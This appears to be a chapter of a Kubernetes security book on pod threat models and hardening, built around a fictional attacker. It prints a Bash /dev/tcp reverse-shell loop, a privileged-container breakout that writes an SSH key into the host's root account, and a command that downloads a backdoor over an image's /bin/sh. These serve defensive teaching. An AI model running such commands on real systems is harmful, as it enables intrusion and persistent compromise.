In this chapter, we’ll start with the atomic unit of Kubernetes deployment: a pod. Pods run apps, and an app may be a single container or many working together in one or more pods.
We consider what bad things can happen in and around a pod, and look at how you can mitigate the risk of getting attacked.
As with any sensible security effort, we’ll begin by defining a lightweight threat model for your system, identifying the threat actors it defends against, and highlighting the most dangerous threats. This gives you a solid basis to devise countermeasures and controls, and take defensive steps to protect your customer’s valuable data.
We’ll go deep into the trust model of a pod and look at what is trusted by default, where we can tighten security with configuration, and what an attacker’s journey looks like.
Captain Hashjack started their assault on your systems by enumerating BCTL’s DNS subdomains and S3 buckets. These could have offered an easy way into the organisation’s systems, but there was nothing easily exploitable on this occasion. Undeterred, they now create an account on the public website and log in, using a web application scanner like OWASP ZAP (Zed Attack Proxy) to pry into API calls and application code for unexpected responses. They are on the search for leaking web-server banner and version information (to learn which exploits might succeed) and are generally injecting and fuzzing APIs for poorly handled user input.
This is not the level of scrutiny that your poorly maintained codebase and systems are likely to withstand for long. Attackers may be searching for a needle in a haystack, but the safest haystack has no needles at all.
Any computer should be resistant to this type of indiscriminate attack: a Kubernetes system should achieve “minimum viable security” through the capability to protect itself from casual attack with up-to-date software and hardened configuration. Kubernetes encourages regular updates by supporting the last three minor releases (e.g. 1.24, 1.23, and 1.22), which are released every four months, ensuring a year of patch support. Older versions are unsupported and likely to be vulnerable.
Although many parts of an attack can be automated, this is an involved process. A casual attacker is more likely to scan widely for software paths that trigger published CVEs and run automated tools and scripts against large ranges of IPs (such as the ranges advertised by public cloud providers). These are noisy approaches.
If a vulnerability in your application can be used to run untrusted (and in this case, external) code, it is called an RCE (remote code execution). An adversary can use an RCE to spawn a remote control session into the application’s environment: here it is the container handling the network request, but if the RCE manages to pass untrusted input deeper into the system, it may exploit a different process, pod, or cluster.
Your first goal of Kubernetes and pod security should be to prevent remote code execution (RCE), which could be as simple as a kubectl exec, or as complex as a reverse shell, such as the one demonstrated in Figure 2-1.
Application code changes frequently and may hide undiscovered bugs, so robust AppSec practices (including IDE and CI/CD integration of tooling and dedicated security requirements as task acceptance criteria) are essential to keep an attacker from compromising the processes running in a pod.
The Java framework Struts was one of the most widely deployed libraries to suffer a remotely exploitable vulnerability (CVE-2017-5638), which contributed to the breach of Equifax customer data. To fix a supply chain vulnerability like this in a container, it is quickly rebuilt in CI with a patched library, and redeployed, reducing the risk window of vulnerable libraries being exposed to the internet. We examine other ways to get remote code execution throughout the book.
With that, let’s move on to the network aspects.
The greatest attack surface of a Kubernetes cluster is its network interfaces and public-facing pods. Network-facing services such as web servers are the first line of defence in keeping your clusters secure, a topic we will dive into in Chapter 5.
This is because unknown users coming in from across the network scan network-facing applications for the exploitable signs of RCE. They can use automated network scanners to attempt to exploit known vulnerabilities and input-handling errors in network-facing code. If a process or system can be forced to run in an unexpected way, there is the possibility that it can be compromised through these untested logic paths.
To investigate how an attacker may establish a foothold in a remote system using only the humble, all-powerful Bash shell, see for example Chapter 16 of Cybersecurity Ops with bash.
To defend against this, we must scan containers for operating system and application CVEs in the hope of updating them before they are exploited.
If Captain Hashjack has an RCE into a pod, it’s a foothold to attack your system more deeply from the pod’s network position. You should strive to limit what an attacker can do from this position, and customise your security configuration to a workload’s sensitivity. If your controls are too loose, this may be the beginning of an organisation-wide breach for your employer, BCTL.
For an example of spawning a shell via Struts with Metasploit, see Sam Bowne’s guide.
As Captain Hashjack has just discovered, we have also been running a vulnerable version of the Struts library. This offers an opportunity to start attacking the cluster from within.
A simple Bash reverse shell like this one is a good reason to remove Bash from your containers. It uses Bash’s virtual /dev/tcp/ filesystem, and is not exploitable in sh, which doesn’t include this oft-abused feature:
revshell() {
  local DEFAULT_IP="${1:-123.123.123.123}";
  local DEFAULT_PORT="${2:-1234}";
  while :; do
    nohup bash -i &>/dev/tcp/${DEFAULT_IP}/${DEFAULT_PORT} 0>&1;
    sleep 1;
  done
}
As the attack begins, let’s take a look at where the pirates have landed: inside a Kubernetes pod.
Multiple cooperating containers can be logically grouped into a single pod, and every container Kubernetes runs must run inside a pod. Sometimes a pod is called a “workload”, which is one of many copies of the same execution environment. Each pod must run on a Node in your Kubernetes cluster as shown in Figure 2-2.
A pod is a single instance of your application, and to scale to demand, many identical pods are used to replicate the application by a workload resource such as a Deployment, DaemonSet, or StatefulSet.
Your pods may include sidecar containers supporting monitoring, networking, and security, as well as “init” containers for pod bootstrap, enabling you to deploy different application styles. These sidecars are likely to have elevated privileges and be of interest to an adversary.
“Init” containers run in order (first to last) to set up a pod and can make security changes to the namespaces, like Istio’s init container configuring the pod’s iptables (in the kernel’s netfilter) so the runtime pods route traffic through a sidecar container. Sidecars run alongside the primary container in the pod, and all non-init containers in a pod start at the same time.
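To make that ordering concrete, here is a minimal sketch of a pod with an init container (the names, image tags, and the wait-for-DNS command are illustrative, not taken from BCTL’s manifests):

apiVersion: v1
kind: Pod
metadata:
  name: init-demo
spec:
  initContainers:
  - name: wait-for-backend          # runs first; must exit successfully before "app" starts
    image: busybox:1.35
    command: ["sh", "-c", "until nslookup backend; do sleep 2; done"]
  containers:
  - name: app                       # all non-init containers start together once init completes
    image: nginx:1.21
    ports:
    - containerPort: 80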
Kubernetes is a distributed system, and ordering of actions (like applying a multi-doc YAML file) is eventually consistent, meaning that API calls don’t always complete in the order that you expect. Ordering depends on various factors and shouldn’t be relied upon: as Tabitha Sable likes to say, Kubernetes is “a friendly robot that uses control theory to make our hopes and dreams manifest… so long as your hopes and dreams can be expressed in YAML”.
What’s inside a pod? Cloud native applications are often microservices, web servers, workers and batch processes. Some pods run one-shot tasks (wrapped with a job, or maybe one single non-restarting container), perhaps running multiple other pods to assist. All these pods present an opportunity to an attacker. Pods get hacked. Or, more often, a network-facing container process gets hacked.
A pod is a trust boundary encompassing all the containers inside, including their identity and access. There is still separation between pods that you can enhance with policy configuration, but you should consider the entire contents of a pod when threat modelling it.
A pod is a Kubernetes invention: an environment for multiple containers to run inside. It is the smallest deployable unit you can ask Kubernetes to run. A pod has its own IP address, can mount in storage, and its namespaces surround the containers created by the container runtime (e.g. containerd, CRI-O).
A container is a mini-Linux, its processes containerised with control groups
(cgroups
) to limit resource usage and namespaces to limit access. A variety of other
controls can be applied to restrict a containerised process’s behaviour, as we’ll see in this chapter.
The lifecycle of a pod is controlled by the kubelet, the Kubernetes API server’s deputy, deployed on each node in the cluster to manage and run containers. If the kubelet loses contact with the API server, it will continue to manage its workloads, restarting them if necessary. If the kubelet crashes, the container manager will also keep containers running in case they crash. The Kubelet and container manager oversee your workloads.

The kubelet runs pods on worker nodes by instructing the container runtime and configuring network and storage. Each container in a pod is a collection of Linux namespaces, cgroups, capabilities, and Linux Security Modules (LSMs). As the container runtime builds a container, each namespace is created and configured individually before being combined into a container.
Capabilities are individual switches for “special” root user operations such as changing any file’s permissions, loading modules into the kernel, accessing devices in raw mode (e.g. networks and IO), BPF and performance monitoring, and every other operation.
The root user has all capabilities, and capabilities can be granted to any process or user (“ambient capabilities”). Excess capability grants may lead to container breakout, as we see later in this chapter.
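A common defensive pattern, sketched below, is to drop all capabilities in a container’s securityContext and add back only what the workload genuinely needs (the single added capability here is illustrative):

securityContext:
  capabilities:
    drop: ["ALL"]
    add: ["NET_BIND_SERVICE"]   # only if the process must bind a port below 1024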
In Kubernetes, a newly-created container is added to the pod by the container runtime, where it shares network and interprocess communication namespaces between pod containers.
Figure 2-4 shows a Kubelet running four individual pods on a single node.
The container is the first line of defence against an adversary, and container images should be scanned for CVEs before being run. This simple step reduces the risk of running an outdated or malicious container and informs your risk-based deployment decisions: do you ship to production, or is there an exploitable CVE that needs patching first?
"Official" container images in public registries have a greater likelihood of being up to date and well-patched, and Docker Hub signs all official images with Notary as we'll see in <<ch-apps-supply-chain>>.
Public container registries often host malicious images, so detecting them before production is essential. Figure 2-5 shows how this might happen.
Although starting a malicious container under a correctly configured container runtime is usually safe, there have been attacks against the container bootstrap phase. We examine the /proc/self/exe breakout CVE-2019-5736 later in this chapter.
The Kubelet attaches pods to a container network interface (CNI). CNI network traffic is treated as layer 4 TCP/IP (although the underlying network technology used by the CNI plugin may differ), and encryption is the job of the CNI plugin, the application, a service mesh, or at a minimum, the underlay networking between the nodes. If traffic is unencrypted, it may be sniffed by a compromised pod or node.
Pods can also have storage attached by Kubernetes, using the CSI (Container Storage Interface), which includes the PersistentVolumeClaim and StorageClass seen in Figure 2-6. In Chapter 6 we will get deeper into the storage aspects.
Vulnerabilities have been found in many storage drivers, including CVE-2018-11235, which exposed a Git attack on the gitrepo storage volume, and CVE-2017-1002101, a subpath volume mount mishandling error. We will cover these in Chapter 6.
In Figure 2-6 you can see a view of the control plane and the API server’s central role in the cluster. The API Server is responsible for interacting with the cluster data store (etcd), hosting the cluster’s extensible API surface, and managing the Kubelets. If the API server or etcd instance is compromised, the attacker has complete control of the cluster: these are the most sensitive parts of the system.
For performance in larger clusters, the control plane should run on separate infrastructure to etcd, which requires high disk and network I/O to support reasonable response times for its distributed consensus algorithm, Raft.
As the API server is the etcd cluster’s only client, compromise of either effectively roots the cluster: due to Kubernetes’ asynchronous scheduling, the injection of malicious, unscheduled pods into etcd will trigger their scheduling to a Kubelet.
As with all fast-moving software, there have been vulnerabilities in most parts of Kubernetes’ stack. The only solution to running modern software is a healthy continuous integration infrastructure capable of promptly redeploying vulnerable clusters upon a vulnerability announcement.
Okay, so we have a high-level view of a cluster. But at a low level, what is a “container”? It is a microcosm of Linux that gives a process the illusion of a dedicated kernel, network, and userspace. Software trickery fools the process inside your container into believing it is the only process running on the host machine. This is useful for isolation and migration of your existing workloads into Kubernetes.
As Christian Brauner and Stephane Graber like to say “(Linux) containers are a userspace fiction”, a collection of configurations that present an illusion of isolation to a process inside. Containers emerged from the primordial kernel soup, a child of evolution rather than intelligent design that has been morphed, refined, and coerced into shape so that we now have something usable.
Containers don’t exist as a single API, library, or kernel feature. They are merely the resultant bundling and isolation that’s left over once the kernel has started a collection of namespaces, configured some cgroups and capabilities, added Linux Security Modules like AppArmor and SELinux, and started our precious little process inside.
A container is a process in a special environment with some combination of namespaces either enabled or shared with the host (or other containers). The process comes from a container image, a TAR file containing the container’s root filesystem, its application(s), and any dependencies. When the image is unpacked into a directory on the host and a special filesystem “pivot root” is created, a “container” is constructed around it, and its ENTRYPOINT is run from the filesystem within the container. This is roughly how a container starts, and each container in a pod must go through this process.
Container security has two parts: the contents of the container image, and its runtime configuration and security context. An abstract risk rating of a container can be derived from the number of security primitives it enables and uses safely (avoiding host namespaces, limiting resource use with cgroups, dropping unneeded capabilities, tightening security module configuration for the process’s usage pattern, and minimising process and filesystem ownership and contents). Kubesec.io rates a pod configuration’s security on how well it enables these features at runtime.
When the kernel detects a network namespace is empty, it will destroy the namespace, removing any IPs allocated to network adapters in it. For a pod with only a single container to hold the network namespace’s IP allocation, a crashed and restarting container would have a new network namespace created and so have a new IP assigned. This rapid churn of IPs would create unnecessary noise for your operators and security monitoring, and so Kubernetes uses the almighty pause container to hold the pod’s shared network namespace open in the event of a crash-looping tenant container. This container is invisible via the Kubernetes API but visible to the container runtime on the host:
[email protected]:~ [0]$ docker ps --format '{{.ID}} {{.Image}} {{.Names}}' | grep sublimino-
92bfb60ce6f1 busybox k8s_alpine_sublimino-frontend-5cc74f44b8-4z86v_default_845db3d9-780d-49e5-bcdf-bc91b2cf9cbe_0
21d86e7b4faf k8s.gcr.io/pause:3.1 k8s_POD_sublimino-frontend-5cc74f44b8-4z86v_default_845db3d9-780d-49e5-bcdf-bc91b2cf9cbe_1
...
adcddc431673 busybox k8s_alpine_sublimino-microservice-755d97b46b-xqrw9_default_1eaeaf4c-3a22-4fc9-a154-036e5381338b_0
1a9dcc794b23 k8s.gcr.io/pause:3.1 k8s_POD_sublimino-microservice-755d97b46b-xqrw9_default_1eaeaf4c-3a22-4fc9-a154-036e5381338b_1
...
fa6ac946cf38 busybox k8s_alpine_sublimino-frontend-5cc74f44b8-hnxz5_default_9ba3a8c2-509d-41e0-8771-f38bec5216eb_0
6dbd4f68c9f2 k8s.gcr.io/pause:3.1 k8s_POD_sublimino-frontend-5cc74f44b8-hnxz5_default_9ba3a8c2-509d-41e0-8771-f38bec5216eb_1
A group of containers in a pod share a network namespace, so all your containers’ ports are available on the same network adapter to any container in the pod. This gives an attacker in one container of the pod a chance to attack private sockets available on any network interface, including the loopback adapter 127.0.0.1.
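As a minimal sketch of that shared boundary (names and image tags are illustrative), any sidecar in this pod can reach the app container’s port over loopback:

apiVersion: v1
kind: Pod
metadata:
  name: shared-netns-demo
spec:
  containers:
  - name: app
    image: nginx:1.21             # listens on port 80
  - name: sidecar
    image: curlimages/curl:7.78.0
    # same network namespace: 127.0.0.1:80 reaches the "app" container
    command: ["sh", "-c", "while true; do curl -s http://127.0.0.1:80 > /dev/null; sleep 30; done"]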
We examine these concepts in greater detail in Chapters 5 and 6.
Each container runs in a root filesystem from its container image that is not shared between containers. Volumes must be mounted into each container in the pod configuration, but a pod’s volumes may be available to all containers if configured that way, as Figure 2-3 shows.
Here we see Figure 2-7 with some of the paths inside a container workload that an attacker may be interested in (note the user and time namespaces are not currently in use):
User namespaces are the ultimate kernel security frontier, and are generally not enabled due to historically being likely entry points for kernel attacks: everything in Linux is a file, and user namespace implementation cuts across the whole kernel, making it more difficult to secure than other namespaces.
The special virtual filesystems listed here are all possible paths of breakout if misconfigured and accessible inside the container: /dev may give access to the host’s devices, /proc can leak process information, and /sys supports functionality like launching new containers.
A Chief Information Security Officer (CISO) is responsible for the organisation’s security. Your role as a CISO means you should consider worst case scenarios, to ensure that you have appropriate defences and mitigations in place. Attack trees help to model these negative outcomes, and one of the data sources you can use is the Threat Matrix as shown in Figure 2-8.
But there are some threats missing, and the community has added some (thanks to Alcide, and Brad Geesaman and Ian Coldwater again), as shown in Figure 2-9:
| Initial Access (Popping a shell pt 1 - prep) | Execution (Popping a shell pt 2 - exec) | Persistence (Keeping the shell) | Privilege Escalation (Container breakout) | Defense Evasion (Assuming no IDS) | Credential Access (Juicy creds) | Discovery (Enumerate possible pivots) | Lateral Movement (Pivot) | Command & Control (C2 methods) | Impact (Dangers) |
|---|---|---|---|---|---|---|---|---|---|
| Using Cloud Credentials - service account keys, impersonation | Exec Into Container (bypass admission control policy) | Backdoor Container (add a reverse shell to local or container registry image) | Privileged container (legitimate escalation to host) | Clear Container Logs (covering tracks after host breakout) | List K8s Secrets | List K8s API Server (nmap, curl) | Access Cloud Resources (workload identity and cloud integrations) | Dynamic Resolution (DNS tunnelling) | Data Destruction (datastores, files, NAS, ransomware…) |
| Compromised Images In Registry (supply chain unpatched or malicious) | BASH/CMD Inside Container (Implant or trojan, RCE/reverse shell, malware, C2, DNS tunnelling) | Writable Host Path Mount (host mount breakout) | Cluster Admin Role Binding (untested RBAC) | Delete K8s Events (covering tracks after host breakout) | Mount Service Principal (Azure specific) | Access Kubelet API | Container Service Account (API server) | App Protocols (L7 protocols, TLS, …) | Resource Hijacking (cryptojacking, malware c2/distribution, open relays, botnet membership) |
| Application Vulnerability (supply chain unpatched or malicious) | Start New Container (with malicious payload: persistence, enumeration, observation, escalation) | K8s CronJob (reverse shell on a timer) | Access Cloud Resources (metadata attack via workload identity) | Connect From Proxy Server (to cover source IP, external to cluster) | Applications Credentials In Config Files (key material) | Access K8s Dashboard (UI requires service account credentials) | Cluster Internal Networking (attack neighbouring pods or systems) | Botnet (k3d, or traditional) | Application DoS |
| KubeConfig File (exfiltrated, or uploaded to the wrong place) | Application Exploit (RCE) | Static Pods (reverse shell, shadow API server to read audit-log-only headers) | Pod hostPath Mount (logs to container breakout) | Pod/Container Name Similarity (visual evasion, cronjob attack) | Access Container Service Account (RBAC lateral jumps) | Network Mapping (nmap, curl) | Access Container Service Account (RBAC lateral jumps) | | Node Scheduling DoS |
| Compromise User Endpoint (2FA and federating auth mitigate) | SSH Server Inside Container (bad practice) | Injected Sidecar Containers (malicious mutating webhook) | Node To Cluster Escalation (stolen credentials, node label rebinding attack) | Dynamic Resolution (DNS) (DNS tunnelling/exfiltration) | Compromise Admission Controllers | Instance Metadata API (workload identity) | Host Writable Volume Mounts | | Service Discovery DoS |
| K8s API Server Vulnerability (needs CVE and unpatched API server) | Container Life Cycle Hooks (postStart and preStop events in pod yaml) | Rewrite Container Life Cycle Hooks (postStart and preStop events in pod yaml) | Control Plane To Cloud Escalation (keys in secrets, cloud or control plane credentials) | Shadow admission control or API server | Compromise K8s Operator (sensitive RBAC) | Access K8s Dashboard | | | PII or IP exfiltration (cluster or cloud datastores, local accounts) |
| Compromised host (credentials leak/stuffing, unpatched services, supply chain compromise) | Rewrite Liveness Probes (exec into and reverse shell in container) | Compromise Admission Controller (reconfigure and bypass to allow blocked image with flag) | Access Host File System (host mounts) | | | | Access Tiller Endpoint (Helm v3 negates this) | | Container pull rate limit DoS (container registry) |
| Compromised etcd (missing auth) | Shadow admission control or API server (privileged RBAC, reverse shell) | Compromise K8s Operator (compromise flux and read any secrets) | Access K8s Operator | | | | | | SOC/SIEM DoS (event/audit/log rate limit) |
| | | K3d botnet (secondary cluster running on compromised nodes) | Container breakout (kernel or runtime vulnerability e.g. Dirtycow, /proc/self/exe, eBPF verifier bugs, Netfilter) | | | | | | |
We’ll explore these threats in detail as we progress through the book. But the first threat, and the greatest risk to the isolation model of our systems, is an attacker breaking out of the container itself.
A cluster admin’s worst fear is a container breakout, that is, a user or process inside a container that can run code outside of the container’s execution environment.
Strictly speaking, a container breakout should exploit the kernel, attacking the code a container is supposed to be constrained by. In the authors’ opinion, any avoidance of isolation mechanisms breaks the contract the container’s maintainer or operator thought they had with the process(es) inside. This means it should be considered equally threatening to the security of the host system and its data, so we define container breakout to include any evasion of isolation.
Container breakouts may occur in various ways:
an “exploit” including against the kernel, network or storage stack, or container runtime
a “pivot” such as attacking exposed local, cloud, or network services, or escalating privilege and abusing discovered or inherited credentials
or most likely just a misconfiguration that allows an attacker an easier or legitimate path to exploit or pivot
If the running process is owned by an unprivileged user (that is, one with no root capabilities), many breakouts are not possible. In that case the process or user must gain capabilities with a local privilege escalation inside the container before attempting to break out.
Once this is achieved, a breakout may start with a hostile root-owned process running in a poorly configured container.
Access to the root user’s capabilities within a container is the precursor to most escapes: without root (and sometimes CAP_SYS_ADMIN), many breakouts are nullified.
The securityContext and LSM configurations are vital to constrain unexpected activity from zero-day vulnerabilities, or supply chain attacks (library code loaded into the container and exploited automatically at runtime). You can define the active user, group, and filesystem group (set on mounted volumes to ensure readability, gated by fsGroupChangePolicy) in your workloads’ security contexts, and enforce it with admission control (see Chapter 8), as this example from the docs shows:
apiVersion: v1
kind: Pod
metadata:
  name: security-context-demo
spec:
  securityContext:
    runAsUser: 1000
    runAsGroup: 3000
    fsGroup: 2000
  containers:
  - name: sec-ctx-demo
    # ...
    securityContext:
      allowPrivilegeEscalation: false
    # ...
In a container breakout scenario, if the user is root inside the container and has mount capabilities (granted by default under CAP_SYS_ADMIN, which root has unless dropped), they can interact with virtual and physical disks mounted into the container. If the container is privileged (which, amongst other things, disables masking of kernel paths in /dev), it can see and mount the host filesystem.
# inside a privileged container
[email protected]:~ [0]$ ls -lasp /dev/
[email protected]:~ [0]$ mount /dev/xvda1 /mnt/
# write into host filesystem's /root/.ssh/ folder
[email protected]:~ [0]$ cat MY_PUB_KEY >> /mnt/root/.ssh/authorized_keys
We look at nsenter privileged container breakouts, which escape more elegantly by entering the host’s namespaces, in Chapter 6.
While you can easily prevent this attack by avoiding the root user and privileged mode, and enforcing that with admission control, it’s an indication of just how slim the container security boundary can be if misconfigured.
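One way to enforce “no root, no privileged” at the cluster boundary rather than trusting each pod spec is admission control; a minimal sketch, assuming the built-in Pod Security admission controller available in newer Kubernetes releases (the namespace name is illustrative):

apiVersion: v1
kind: Namespace
metadata:
  name: frontend
  labels:
    # reject pods that do not meet the "restricted" Pod Security Standard
    # (no privileged mode, no root user, no host namespaces, and more)
    pod-security.kubernetes.io/enforce: restricted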
An attacker controlling a containerised process may have control of the networking, some or all of the storage, and potentially other containers in the pod. Containers generally assume other containers in the pod are friendly as they share resources, and we can consider the pod as a trust boundary for the processes inside. Init containers are an exception: they complete and shut down before the main containers in the pod start, and as they operate in isolation may have more security sensitivity.
The container and pod isolation model relies on the Linux kernel and container runtime, both of which are generally robust when not misconfigured. Container breakout occurs more often through insecure configuration than kernel exploit, although zero-day kernel vulnerabilities are inevitably devastating to Linux systems without correctly configured LSMs (Linux Security Modules, such as SELinux and AppArmor).
In “Architecting Containerised Applications for Resilience” we explore how the Linux Dirtycow vulnerability could break out of insecurely configured containers. One of the authors live demoed fixing the breakout with AppArmor.
Container escape is rarely plain sailing: fresh vulnerabilities are often patched shortly after disclosure, only occasionally does a kernel vulnerability result in an exploitable container breakout, and the opportunity to harden individually containerised processes with LSMs lets defenders tightly constrain high-risk network-facing processes. An escape may entail one or more of:
finding a zero-day in the runtime or kernel
exploiting excess privilege and escaping using legitimate commands
evading misconfigured kernel security mechanisms
introspection of other processes or filesystems for alternate escape routes
sniffing network traffic for credentials
attacking the underlying orchestrator or cloud environment
Vulnerabilities in the underlying physical hardware often can’t be defended against in a container. For example, Spectre and Meltdown (CPU speculative execution attacks), and rowhammer, TRRespass, and SPOILER (DRAM memory attacks) bypass container isolation mechanisms, as containers cannot intercept the entire instruction stream that a CPU processes. Hypervisors suffer the same lack of possible protection.
Finding new kernel attacks is hard. Misconfigured security settings, exploiting published CVEs, and social engineering attacks are easier. But it’s important to understand the range of potential threats in order to decide your own risk tolerance.
We’ll go through a step-by-step security feature exploration to see a range of ways in which your systems may be attacked in the Appendix.
For more information on how the Kubernetes project manages CVEs, see Exploring container security: Vulnerability management in open-source Kubernetes.
We’ve spoken generally about various parts of a pod, so let’s finish off by going into depth on a pod spec to call out any gotchas or potential footguns.
In order to secure a pod or container, the container runtime should be minimally viably secure, that is: not exposing sockets to unauthenticated connections (e.g. /var/run/docker.sock and tcp://127.0.0.1:2375), as this leads to host takeover.
For the purpose of this example, we are using a frontend pod from the GoogleCloudPlatform/microservices-demo application, deployed with kubectl create -f https://raw.githubusercontent.com/GoogleCloudPlatform/microservices-demo/master/release/kubernetes-manifests.yaml. We have updated and added some extra configuration where relevant for demonstration purposes.
The standard header we know and love, defining the type of entity this YAML defines, and its version:

apiVersion: v1
kind: Pod
Metadata and annotations may contain sensitive information like IPs and security hints (in this case, for Istio), although this is only useful if the attacker has read-only access:
metadata:
  annotations:
    seccomp.security.alpha.kubernetes.io/pod: runtime/default
    cni.projectcalico.org/podIP: 192.168.155.130/32
    cni.projectcalico.org/podIPs: 192.168.155.130/32
    sidecar.istio.io/rewriteAppHTTPProbers: "true"
It also historically holds the seccomp, AppArmor, and SELinux policies:
metadata:
  annotations:
    container.apparmor.security.beta.kubernetes.io/hello: localhost/k8s-apparmor-example-deny-write
We look at how to use these annotations in the runtime policies section.
After many years in purgatorial limbo, seccomp in Kubernetes progressed to General Availability in v1.19. This changes the syntax from an annotation to a securityContext entry:
securityContext:
  seccompProfile:
    type: Localhost
    localhostProfile: my-seccomp-profile.json
The Kubernetes Security Profiles Operator (SPO) can install seccomp profiles on your nodes (a prerequisite to their use by the container runtime), and record new profiles from workloads in the cluster with oci-seccomp-bpf-hook.
The SPO also supports SELinux via selinuxd, with plenty of details in this blog post.
AppArmor is still in beta but annotations will be replaced with first-class fields like seccomp once it graduates to GA.
Let’s move on to a part of the pod spec that is not writable by the client but contains some important hints.
When you dump a pod spec from the API server (using, for example, kubectl get -o yaml), it includes the pod’s start time:
creationTimestamp: "2021-05-29T11:20:53Z"
Pods running for longer than a week or two are likely to be at higher risk of bugs. Sensitive workloads running for more than 30 days will be safer if they’re rebuilt in CI/CD to account for library or operating system patches.
Pipeline scanning the existing container image offline for CVEs can be used to inform rebuilds. The safest approach is to combine both: “repave” (that is, rebuild and redeploy containers) regularly, and rebuild through the CI/CD pipelines whenever a CVE is detected.
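As a sketch of that pipeline gate, assuming Trivy as the scanner and a GitHub Actions-style workflow (the workflow layout and image reference are illustrative; adapt to your own CI system):

name: image-scan
on: [push]
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - name: Fail the build on HIGH or CRITICAL CVEs
        # assumes trivy is already installed on the runner
        run: |
          trivy image --severity HIGH,CRITICAL --exit-code 1 \
            gcr.io/google-samples/microservices-demo/frontend:v0.2.3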
Labels in Kubernetes are not validated or strongly typed: they are metadata. Labels are targeted by things like services and controllers using selectors for referencing, and are also used for security features such as Network Policy.
labels:
  app: frontend
  type: redish
Typos in labels mean they do not match the intended selectors, and so can inadvertently introduce security issues such as the following (see the sketch after this list):
exclusions from expected network policy or admission control policy
unexpected routing from service target selectors
“rogue” pods that are not accurately targeted by operators or observability tooling
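For example, this NetworkPolicy (a minimal sketch; names and port are illustrative) only applies to pods labelled app: frontend, so a pod mislabelled app: fronted silently falls outside it:

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: frontend-ingress
spec:
  podSelector:
    matchLabels:
      app: frontend        # a pod labelled "app: fronted" is NOT selected by this policy
  ingress:
  - from:
    - podSelector:
        matchLabels:
          app: loadgenerator
    ports:
    - protocol: TCP
      port: 8080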
Managed fields were introduced in v1.18 and support server-side apply. They duplicate information from elsewhere in the pod spec and are of limited interest to us, as we can read the entire spec from the API server. They look like this:
managedFields:
- apiVersion: v1
  fieldsType: FieldsV1
  fieldsV1:
    f:metadata:
      f:annotations:
        .: {}
        f:sidecar.istio.io/rewriteAppHTTPProbers: {}
        # ...
    f:spec:
      f:containers:
        k:{"name":"server"}:
          # ...
          f:image: {}
          f:imagePullPolicy: {}
          f:livenessProbe:
            # ...
We know the pod’s name and namespace from the API request we made to retrieve it.
If we used --all-namespaces to return all pod configurations, this shows us the namespace:
name: frontend-6b887d8db5-xhkmw
namespace: default
From within a pod it’s possible to infer the current namespace from the DNS resolver configuration in /etc/resolv.conf (which is secret-namespace in this example):
$ grep -o "search [^ ]*" /etc/resolv.conf
search secret-namespace.svc.cluster.local
Other less-robust options include the mounted service account (assuming it’s in the same namespace, which it may not be), or the cluster’s DNS resolver (if you can enumerate or scrape it).
Now we’re getting into interesting configuration. We want to see the environment variables in a pod, partially because they may leak secret information (which should have been mounted as a file), and also because they may list which other services are available in the namespace and so suggest other network routes and applications to attack:
As you can see below, passwords set in deployment and pod YAML are visible to the operator that deploys the YAML, to the process at runtime and any other processes that can read its environment, and to anybody who can read from the Kubernetes or Kubelet APIs.
Here we see the container’s PORT (which is good practice and required by applications running in Knative and some other systems), the DNS names and ports of its coordinating services, some badly-set database config and credentials, and finally a sensibly-referenced secret file.
spec:
  containers:
  - env:
    - name: PORT
      value: "8080"
    - name: CURRENCY_SERVICE_ADDR
      value: currencyservice:7000
    - name: SHIPPING_SERVICE_ADDR
      value: shippingservice:50051
    # These environment variables should be set in secrets
    - name: DATABASE_ADDR
      value: postgres:5432
    - name: DATABASE_USER
      value: secret_user_name
    - name: DATABASE_PASSWORD
      value: the_secret_password
    - name: DATABASE_NAME
      value: users
    # This is a safer way to reference secrets and configuration
    - name: MY_SECRET_FILE
      value: /mnt/secrets/foo.toml
That wasn’t too bad, right? Let’s move on to container images.
The container image’s filesystem is of paramount importance to an attacker, as it may hold vulnerabilities that assist in privilege escalation. If you’re not patching regularly Captain Hashjack might get the same image from a public registry to scan it for vulnerabilities they may be able to exploit. Knowing what binaries and files are available also enables attack planning “offline”, so adversaries can be more stealthy and targeted when attacking the live system.
The OCI registry specification allows arbitrary image layer storage: pushing is a two-step process, where the image’s blobs are uploaded first and the manifest that references them second. If an attacker performs only the first step, they gain free arbitrary blob storage.
Most registries don’t index this automatically (with Harbor being the exception), and so they will store the “orphaned” layers forever, potentially hidden from view until manually garbage collected.
Here we see an image referenced by label, which means we can’t tell what the actual SHA256 hash digest of the container image is. The container tag could have been updated since this deployment as it’s not referenced by digest.
image: gcr.io/google-samples/microservices-demo/frontend:v0.2.3
Instead of using image tags, we can use the SHA256 image digests to pull the image by its content address:
image: gcr.io/google-samples/microservices-demo/frontend@sha256:ca5c0f0771c89ec9dbfcbb4bfbbd9a048c25f7a625d97781920b35db6cecc19c
Images should always be referenced by SHA256, or use signed tags, otherwise it’s impossible to know what’s running as the label may have been updated in the registry since the container start. You can validate what’s being run by inspecting the running container for its image’s SHA256.
It’s possible to specify both a tag and a SHA256 digest in a Kubernetes image: key, in which case the tag is ignored and the image is retrieved by digest. This leads to potentially confusing image definitions such as controlplane/bizcard:<tag>@sha256:649f3a84b95ee84c86d70d50f42c6d43ce98099c927f49542c1eb85093953875 being retrieved as the image matching the SHA rather than the tag.
If an attacker can influence the local Kubelet image cache, they can add malicious code to an image and re-label it on the host node:
# load a malicious Bash/sh backdoor and overwrite the container's default CMD (/bin/sh)
$ docker run -it --cidfile=cidfile --entrypoint /bin/busybox \
    gcr.io/google-samples/microservices-demo/frontend:v0.2.3 \
    wget https://securi.fyi/b4shd00r -O /bin/sh
# commit the changed container using the same tag
$ docker commit $(<cidfile) gcr.io/google-samples/microservices-demo/frontend:v0.2.3
# to run this again, don't forget to remove the cidfile
While the compromise of a local registry cache may lead to this attack, container cache access probably comes by rooting the node, and so this may be the least of your worries.
The image pull policy of Always has a performance drawback in highly dynamic, “autoscaling from zero” environments such as Knative. When startup times are crucial, a potentially multi-second imagePullPolicy latency is unacceptable and image digests must be used.

This attack on a local image cache can be mitigated with an image pull policy of Always, which ensures the local tag matches what’s defined in the registry it’s pulled from. This is important, and you should always be mindful of this setting:

imagePullPolicy: Always
Typos in container image names, or registry names, will deploy unexpected code if an adversary has “typosquatted” the image with a malicious container. This can be difficult to detect: for example, controlplan/hack instead of controlplane/hack. Tools like Notary protect against this by checking for valid signatures from trusted parties.
